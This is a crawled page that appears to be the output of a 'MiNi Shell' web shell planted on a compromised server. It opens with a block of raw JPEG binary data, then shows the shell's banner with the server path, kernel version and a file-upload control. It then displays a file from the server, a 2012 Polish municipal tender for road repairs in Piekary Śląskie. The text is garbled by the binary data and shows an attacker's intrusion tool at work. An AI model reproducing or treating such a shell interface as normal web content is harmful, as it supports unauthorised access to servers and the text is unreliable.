JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121219/268551-N-2012.html

<p class="kh_header"><b>Piekary Śląskie: Remonty bieżące dróg na terenie miasta Piekary Śląskie w 2013 roku</b><br>
<b>Numer ogłoszenia: 268551 - 2012; data zamieszczenia: 19.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta  Piekary Śląskie , ul. Bytomska 84, 41-940 Piekary Śląskie, woj. śląskie, tel. 032 3939337, faks (032) 287 22 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty bieżące dróg na terenie miasta Piekary Śląskie w 2013 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1
KNR 2-31 803 03
Mechaniczne rozebranie nawierzchni z mieszanek mineralno - bitumicznych grubości 3 cm
zł 1m2
1000

2
KNR 2-31 803 04
Mechaniczne rozebranie nawierzchni z mieszanek mineralno - bitumicznych, dodatek za każdy dalszy 1 cm
zł/1m2
3000

3
Kalkulacja własna
Frezowanie nawierzchni asfaltowej gr. 4 cm bez transportu
zł/1m2
15000

4
Kalkulacja własna
Frezowanie nawierzchni asfaltowej - każdy następny 1 cm grubości bez transportu
zł/1m2
30000

5
KNR 2-31 102/01 
Koryta wykonywane na poszerzeniach do 10cm
zł/ 1m2
100

6
KNR 2-31 102/02
Koryta wykonywane na poszerzeniach za każde dalsze 5 cm głębokości
zł/ 1m2
100

7
KNR 2-01 203/06, 208/05
Roboty ziemne koparkami w gr. kat. III z transportem urobku samochodami samowyładowczymi 5-10t na odl. 10 km
zł/1m3
1500

8
KNR 2-01 301/01, 208/05
Ręczne roboty ziemne z transportem urobku na odległość 10 km
zł/1m3
100

9
KNR 2-31 0814-01
Rozebranie obrzeży 6 x 20 na podsypce cementowo - piaskowej
zł/m
1000

10
KNR 2-31 0804-03
Mechaniczne rozebranie podbudowy z tłucznia kamiennego gr 15 cm
zł/1m2
200

11
KNR 2-31 0804-04
Mechaniczne rozebranie nawierzchni z tłucznia kamiennego - każdy dalszy 1 cm grubości 10 cm
zł/1m2
2000

12
Kalkulacja własna
Mechaniczna rozbiórka chodnika z kostki 
zł/1m2
3000

13
Kalkulacja własna
Mechaniczna rozbiórka nawierzchni z trylinki betonowej anal 15 cm
zł/1m2
200

14
KNR 2-31 0812-03, KNR 2-31 0813-01
Rozebranie krawężników na ławie betonowej
zł/m
4000

15
KNR 2-31 0805-01
Ręczne rozebranie kostki betonowej analogia (6 lub 8 cm) z segregacją i układką na paletach
zł/1m2
100

II. ROBOTY TRANSPORTOWE


16
KNR 4-01 108/11
Wywóz gruzu spryzmowanego samochodami samowyładowczymi na odległość do 1 km
zł/1m3
1200


17
KNR 4-01 108/12
Wywóz gruzu spryzmowanego samochodami samowyładowczymi za każdy następny 1 km
zł/1m3
1200


III. WYKONANIE WARSTW PODBUDOWY


18
KNR 2-31 108/02
Mechaniczne wyrównanie istniejącej podbudowy mieszanką mineralno - bitumiczną
zł/1t
100


19
KNR 2-31 107/01
Wyrównanie istniejącej podbudowy tłuczniem, średnia grubość warstwy po zagęszczeniu do 10 cm
zł/1m3
100


20
KNR 2-31 110/01
Wykonanie podbudowy z mieszanek mineralno - bitumicznych gr. 4 cm
zł/1m2
1000


21
KNR 2-31 110/02
Wykonanie podbudowy z mieszanek mineralno - bitumicznych, dodatek za każdy następny 1 cm grubości warstwy
zł/1m2
3000


22
KNR 2-31 114/05
Wykonanie podbudowy z kruszywa łamanego kamiennego grubości 15 cm
zł/1m2
1000


23
KNR 2-31 114/06
Wykonanie podbudowy z kruszywa łamanego, dodatek za każdy następny 1 cm grubości 
zł/1m2
10000


24
KNR 2-31 116/05
Podbudowa z żużla wielkopiecowego gr. 10 cm, rozścielenie ręczne
zł/1m2
1500


25
KNR 2-31 116/06 
Podbudowa z żużla wielkopiecowego, rozścielenie ręczne, dodatek za każdy dalszy 1 cm
zł/1m2
7500


26
Kalkulacja własna
Wzmocnienie podbudowy za pomocą siatki stalowej (nawierzchnia asfaltowa), warstwa slurry seal 
zł/ 1m2
1000


IV. WYKONANIE WARSTW ASFALTOWYCH wiążącej i ścieralnej


27
KNR 2-31 1106/01
Remont cząstkowy nawierzchni bitumicznych mieszankami mineralno - bitumicznymi
zł/1t
150


28
KNR 2-31 310/05
Wykonanie warstwy ścieralnej z mieszanek mineralno - bitumicznych gr. 3 cm
zł/1m2
15000


29
KNR 2-31 310/06
Wykonanie warstwy ścieralnej z mieszanek mineralno - bitumicznych, dodatek za każdy następny 1 cm grubości warstwy
zł/1m2
30000


30
KNR 2-31 310/01
Wykonanie warstwy wiążącej z mieszanek mineralno - bitumicznych gr. 4 cm
zł/1m2
7000


31
KNR 2-31 310/02 
Wykonanie warstwy wiążącej z mieszanek mineralno - bitumicznych, dodatek za każdy następny 1 cm grubości warstwy
zł/1m2
14000


32
KNNR 6 0308/01
Wykonanie w-wy wiążącej z mieszanek mineralno-bitumicnych o grubości 4cm (WMS)
zł/1m2
500


33
KNNR 6 0309/02
Wykonanie w-wy ścieralnej z mieszanek mineralno-bitumicnych o grubości 4cm (SMA)
zł/1m2
1000


34
KNR 2-31 1004/07
Skropienie nawierzchni drogowej asfaltem 
zł/1m2
20000


35
KNR 2-31 503/01 i 02
Ręczne ułożenie nawierzchni z mieszanek mineralno - bitumicznych grubości 5 cm
zł/1m2
100


V. REMONT NAWIERZCHNI CHODNIKA Z KRAWĘŻNIKAMI


36
KNR 2-31 511/01(2)
Wykonanie nawierzchni chodników, wjazdów, placów z kostki brukowej betonowej gr. 6 cm - bez wartości kostki
zł/1m2
500


37
KNR 2-31 511/04
Wykonanie nawierzchni chodników, wjazdów, placów z kostki brukowej betonowej gr. 8 cm - bez wartości kostki
zł/1m2
3000


38
Kalkulacja własna
Wykonanie nawierzchni chodników, koszt kostki prostokątnej gr 6 cm kolorowej, narzuty
zł/1m2
150


39
Kalkulacja własna
Wykonanie nawierzchni chodników, koszt kostki prostokątnej gr 6 cm szarej, narzuty
zł/1m2
350


40
Kalkulacja własna
Wykonanie nawierzchni chodników, koszt kostki prostokątnej gr 8 cm kolorowej, narzuty
zł/1m2
1000


41
Kalkulacja własna
Wykonanie nawierzchni chodników, koszt kostki prostokątnej gr 8 cm szarej, narzuty
zł/1m2
2000


42
KNR 2-31 0502-01
Chodniki z płytek betonowych 35x35x5cm lub 30x30x5 analogia
zł/1m2
50


43
KNR 2-31 0502-06
Utwardzenie terenu płytami ażurowymi (wjazdy skarpy itp)- analogia
zł/1m2
50


44
KNR 2-31 402/04 KNR 2-31 403/01
Ułożenie krawężnika betonowego 15x30 cm na ławie betonowej z oporem 
zł/1m
1500


45
KNR 2-31 407/02
Ułożenie obrzeży betonowych 6x20 cm na podsypce piaskowej
zł/1m
1000


46
KNR 2-31 1201/03
Przełożenie istniejącego krawężnika na nowej ławie betonowej
zł/1m
250


47
KNR 2-31 1203/02
Przełożenie istniejącego obrzeża na podsypce piaskowej
zł/1m
250


VI. ROBOTY INNE


48
Kalkulacja własna
Nawierzchnia z żużla wielkopiecowego grubości 25 cm z wykopem i odwozem ziemi na odległość do 5 km
zł/1m2
1000


49
Kalkulacja własna
Korytowanie i wykonanie nawierzchni z frezów grubości 15cm, skropienie i przesypaniem gabro oraz odwozem ziemi na odległość do 5km
zł/1m2
500


50
Kalkulacja własna
Spoinowanie pęknięć do 5mm nawierzchni asfaltowej (czyszczenie spoin)
zł/m
1000


51
Kalkulacja własna
Spoinowanie ubytków 5 do 50mm w nawierzchni asfaltowej (czyszczenie spoin)
zł/m
500


52
Kalkulacja własna
Spoinowanie ubytków do 50mm nawierzchni asfaltowej (czyszczenie spoin)
zł/m
200


53
Kalkulacja własna
zabudowa odwodnień liniowych z materiałem (korytka 150mm)
zł/m
20


VII. REGULACJE URZĄDZEŃ


54
KNR 2-31 1406-05
Regulacja pionowa studni teletechnicznych
zł/1 szt
15


55
Kalkulacja własna
Do wykonania regulacji , koszt pokrywy studni, narzuty
zł/1 szt
5


56
KNR 2-31 1406-02
Regulacja pionowa studzienek dla krat ściekowych ulicznych
zł/1 szt
25


57
Kalkulacja własna
Do wykonania regulacji , koszt kratki, narzuty
zł/1 szt
10


58
Kalkulacja własna
Do wykonania regulacji , koszt kratki bocznej, narzuty
zł/1 szt
5


59
KNR 2-31 1406-03
Regulacja pionowa studzienek dla włazów kanałowych
zł/1 szt
25


60
Kalkulacja własna
Do wykonania regulacji , koszt włazu, narzuty
zł/1 szt
10


61
KNR 2-31 1406-04
Regulacja pionowa studzienek dla zaworów wodociągowych i gazowych
zł/1 szt
50


62
Kalkulacja własna
Do wykonania regulacji , koszt skrzynki do zaworów, narzuty
zł/1 szt
10


63
w/g załącznika
Stawka roboczogodziny z narzutami bez podatku VAT
zł/r-g
1000



VIII. ZIELEŃ


64
Kalkulacja własna
Koszenie poboczy kosiarkami mechanicznymi, zagrabienie trawy i odwóz na odległość 5 km
zł/1m2
240000


65
Kalkulacja własna
Frezowanie pni po ściętych drzewach
zł/1cm2
50000


66
KNR 2-01 0510-01 , KNR 2-01 0510-02
Humusowanie skarp z obsianiem przy grub. warstwy humusu 5 cm
zł/1m2
1000


67
KNR 2-21 0203/02
Ręczne przekopanie gleby na terenie płaskim w gruncie zadarnionym
zł/1m2
500




Przyjęte w kosztorysie ilości przedmiarowe robót są szacunkowe. Faktyczny zakres robót realizowany będzie w zależności od potrzeb zamawiającego na podstawie zleceń cząstkowych.
Ceny jednostkowe powinny zostać wyliczone ściśle wg podanych w wykazie podstaw wyceny                 (KNR-y) i zawierać wszystkie elementy robót w nich wyszczególnione.
Zamawiający żąda zapewnienia całodobowej łączności telefonicznej z podaniem przez Wykonawcę numerów kontaktowych oraz przystąpienia do robót w ciągu jednego dnia od otrzymania zlecenia, a w przypadku robót awaryjnych w ciągu 180 min. od zgłoszenia telefonicznego niezależnie od pory dnia i dni wolnych od pracy i oznaczenia miejsca awarii ciągu 60 min. od zgłoszenia telefonicznego niezależnie od pory dnia i dni wolnych od pracy. 
Gwarancja - 60 miesięcy.
Wykonawca w cenie powinien ująć:
- koszt typowej organizacji ruchu na czas wykonywania robót,
- możliwość zmian zakresu robót i weryfikację geometrii remontowanego odcinka robót,
- koszt cięcia piłą krawędzi naprawianych ubytków nawierzchni,
- koszt utylizacji materiałów z rozbiórki przy ich wywozie,
- koszt naniesienia na zasoby geodezyjne zmian wprowadzonych w trakcie robót,
- wykonanie kosztorysów szacunkowych na zlecane roboty

Wykonawca, który zostanie wyłoniony w przetargu do wykonania w/w robót przedstawi w dniu podpisania umowy kosztorys szczegółowy na zakres z przedmiaru robót wraz z zestawieniami zastosowanych cen: R,M,S,KP,Kz i Z 
Wykonawca jest zobowiązany do comiesięcznego wystawiania faktur za zakończone roboty w danym miesiącu roboczym lecz nie później niż do 7 dnia następnego miesiąca.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających o wartości do 910 000,00 zł</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 50 000,00 złotych.
      Wadium może być wnoszone w jednej z form wskazanych w art. 45 ust. 6 ustawy Prawo zamówień
      publicznych.
W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek
bankowy Zamawiającego prowadzony przez  ING Bank Śląski: nr  07 1050 1230 1000 0023 2549 4256. 
     W przypadku wniesienia wadium w pieniądzu za moment wniesienia uznaje się moment uznania 
     rachunku Zamawiającego.
Potwierdzenie wniesienia wadium w formie pieniężnej należy dołączyć do oferty. W przypadku złożenia wadium w formie poręczenia lub gwarancji bankowej lub gwarancji ubezpieczeniowej należy załączyć oryginał dokumentu gwarancyjnego do oferty. 
       DO OFERTY NALEŻY ZAŁĄCZYĆ DOKUMENT POTWIERDZAJĄCY WNIESIENIE WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  prawidłowe wykonanie w ostatnich 5 latach  minimum 3 robót tożsamych z przedmiotem zamówienia na kwotę min. 2 000 000,00 zł brutto rocznie każda (słownie: dwa miliony złotych 00/100 ). Przyjmuje się, że robota na kwotę 2 mln zł może stanowić sumę poszczególnych robót (zleceń cząstkowych) za dany rok. Przyjmuje się, że okres 1 roku liczy od dnia 01.01. do 31.12</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponowanie następującym sprzętem tj:
	
l.p.
Nazwa
Ilość minimalna
1.
Samochód samowyładowczy
4
2.
Walec drogowy 7 - 18 T stalowy
1
3.
Walec ogumiony
1
4.
Walec 0,6 T
2
5.
Zagęszczarka
2
6.
Piła spalinowa do cięcia asfaltu 
2
7.
Piła spalinowa do cięcia kostki
2
8.
Frezarka do nawierzchni bitumicznych 0,5 m i 1,5 m
1
9.
Pilarka spalinowa
2
10.
Sprężarka spalinowa (przewoźna)
2
11.
Spychokoparka
2
12.
Rozścielacz do mas bitumicznych o szerokości roboczej 1,5 - 6,0 m
1
13.
Ciągnik kołowy
2
14.
Skrapiarka do asfaltu
2
15.
Przyczepa samowyładowcza 
2
16.
Przyczepa niskopodwoziowa
2
17.
Samochód dostawczy
1
18.
Samochód skrzyniowy
1
19.
Kosiarka ciągnikowa z wysięgnikiem
1
20.
Wykaszarka spalinowa
2
21.
Frezarka do pni
1
22.
Recykler
1
23.
Kocioł do produkcji asfaltu lanego
1
24.
Komplet oznakowania robót drogowych
4
25.
Komplet sygnalizacji wahadłowej
1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponowanie osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi do pełnienia obowiązków kierownika budowy (robót) w specjalności odpowiadającej przedmiotowi zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-posiadanie zdolności kredytowej na kwotę min. 2 000 000,00 zł (dwa miliony zł),
-posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości min. 2 000 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umownego terminu zakończenia przedmiotu niniejszej umowy jest możliwa w następujących przypadkach:
a) wstrzymania robót lub przerw w pracach powstałych z przyczyn warunków pogodowych, które ze względu na termin realizacji inwestycji trudno przewidzieć,
b) wystąpienia w czasie realizacji robót niekorzystnych warunków uniemożliwiających ich wykonanie zgodnie ze sztuką budowlaną</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piekary Śląskie, Biuro Zamówień Publicznych, pok. 218, ul. Bytomska 84, 41-940 Piekary Śląskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2013 godzina 09:00, miejsce: Urząd Miasta Piekary Śląskie, Biuro Zamówień Publicznych, pok. 218, ul. Bytomska 84, 41-940 Piekary Śląskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
